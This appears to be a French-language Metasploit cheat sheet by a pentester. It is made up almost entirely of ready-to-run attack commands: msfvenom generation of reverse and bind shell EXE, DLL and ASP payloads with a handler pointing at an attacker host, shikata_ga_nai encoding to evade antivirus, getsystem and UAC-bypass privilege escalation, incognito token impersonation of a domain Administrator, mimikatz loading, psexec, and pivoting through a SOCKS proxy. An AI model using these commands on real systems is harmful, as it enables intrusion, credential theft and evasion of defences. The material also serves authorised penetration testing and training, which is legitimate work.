Metasploit – Cheatsheet

By : Li_in
metasploit

Renseignement

Rechercher un exploit

search < version / service name / port >

Structure

auxiliary/ # Module, such as scanners, crawlers and fuzzers, can be found here. 

encoders/  # Will allow you to encode the exploit and payload in the hope that a signature-based antivirus solution may miss them

evasion/  # Will encode the payload to "try" evade antivirus software

exploit/  # Exploits, neatly organized by target system.

payloads/        # Code that will run on the target system. 
├── adapters/    # An adapter wraps single payloads to convert them into different formats
├── singles/      # Self-contained payloads (add user, launch notepad.exe, etc.) that do not need to download an additional component to run.
├── stagers/      # Responsible for setting up a connection channel between Metasploit and the target system. Useful when working with staged payloads
└── stages/       # Downloaded by the stager.

post/     # post-exploitation module

Armement

Selectionner un exploit

use <exploit-path>

Annuler la selection

back

Afficher les options

show options

Afficher les payloads compatibles

show payloads

Configurer une option

set <option-name> <value>

Exploitation

Lancer l’exploit

exploit

Lancer des modules post exploitation

0xlun@Lunatik $ [CTR+Z]
msf5 > sessions -l 
msf5 > use post/<path>
msf5 > set SESSION <session-id>
msf5 > run

Sessions

Mettre la session (terminal) en tâche de fond

[CTRL+Z]

Lister les sessions

sessions

Sélectionner une session

sessions -i <session-id>

Ajouter une route (meterpreter session as a proxy) :

route add <CIDR> <session-id>
route print

La session doit pouvoir se connecter au réseau rensigné. On peut récupérer les routes automatiquement avec autoroute :

use multi/manage/autoroute
show options
sessions -l
set session <session-id>
run

On peut ensuite accéder à ces routes via un proxy SOCKS

use auxiliary/server/socks_proxy 
show options
set SRVHOST 127.0.0.1
set VERSION 5
run -j

Shell To Meterpreter

Via shell_to_meterpreter :

msf5 > use post/multi/manage/shell_to_meterpreter
msf5 > set SESSION <session-id>
msf5 > run

Via session :

sessions -u <session-id>

sessions -u -1  # For the last active session

Meterpreter

Lancement du client sur msfconsole

lun$ msfconsole
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > show payloads
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.0.99
msf5 exploit(multi/handler) > set LPORT 443
msf5 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.0.99:443

Status d’activité de la machine :

idletime

Informations du système :

sysinfo

Téléchargement [ victim >> attacker ]

download <source> <destination>

Upload [ attacker >> victim ]

upload <source> <destination>

Executer une commande :

execute -f <command> -i -H

Obtenir un shell standard :

shell

Obtenir un shell powershell standard :

load powershell
powershell_shell

Devenir SYSTEM :

getuid
getsystem
getuid

Migration :

migrate <pid>

Commandes sur la machine locale :

lpwd = pwd
lcd = cd 
lls = ls
lcat = cat

Obtenir le Integrity Level de notre process :

shell
powershell -ep bypass
Import-Module NtObjectManager
Get-NtTokenIntegrityLevel

Incognito

meterpreter > use incognito
Loading extension incognito...success.
meterpreter > help

Incognito Commands
==================

    Command              Description                                             
    -------              -----------                                             
    add_group_user       Attempt to add a user to a global group with all tokens 
    add_localgroup_user  Attempt to add a user to a local group with all tokens  
    add_user             Attempt to add a user with all tokens                   
    impersonate_token    Impersonate specified token                             
    list_tokens          List tokens available under current user context        
    snarf_hashes         Snarf challenge/response hashes for every token         

meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
SNEAKS.IN\Administrator

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

meterpreter > impersonate_token SNEAKS.IN\\Administrator
[+] Delegation token available
[+] Successfully impersonated user SNEAKS.IN\Administrator
meterpreter > getuid
Server username: SNEAKS.IN\Administrator

Post exploitation modules

msf5 > use <exploit>
msf6 exploit(<exploit>) > set SESSION <session-id>
msf6 exploit(<exploit>) > set LPORT <port>
msf6 exploit(<exploit>) > set LHOST <host>
msf6 exploit(<exploit>) > run 

exploit/windows/local/bypassuac_sdclt       #bypass UAC  
exploit/windows/smb/psexec                  #psexec  
post/multi/recon/local_exploit_suggester    # exploit suggester

Charger le module mimikatz dans le shell :

meterpreter > load kiwi       # mimikatz module 
meterpreter > help

Msfvenom

Lister :

msfvenom -l payloads # Payloads
msfvenom -l encoders # Encoders

Payloads classiques :

windows/shell_reverse_tcp              # x86 simple reverse shell
windows/x64/shell_reverse_tcp          # x64 simple reverse shell
windows/meterpreter/reverse_tcp        # x86 meterpreter reverse shell
windows/x64/meterpreter/reverse_tcp    # x64 meterpreter reverse shell

linux/x86/shell_reverse_tcp            # x86 simple reverse shell
linux/x64/shell_reverse_tcp            # x64 simple reverse shell
linux/x86/meterpreter/reverse_tcp      # x86 meterpreter reverse shell
linux/x64/meterpreter/reverse_tcp      # x64 meterpreter reverse shell

Autres : msfvenom -l payloads

Lister les options de la payload :

msfvenom -p <payload/path> --list-options

Générer une EXE :

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe -o reverse.exe

msfvenom -p windows/meterpreter/bind_tcp LPORT=<PORT> -f exe -o bind.exe

Générer une DLL :

msfvenom -p <payload/path> <option>=<value> -f dll -o <dllname>.dll

Générer un aspx/asp :

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > reverse.asp

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f aspx > reverse.aspx

Obfuscation :

msfvenom -p windows/meterpreter/reverse_tcp --encoder x86/shikata_ga_nai LHOST=<IP> LPORT=<PORT> -f exe -o reverse.exe

Formats (-f) :

# Executable formats
asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war

# Transform formats
bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscr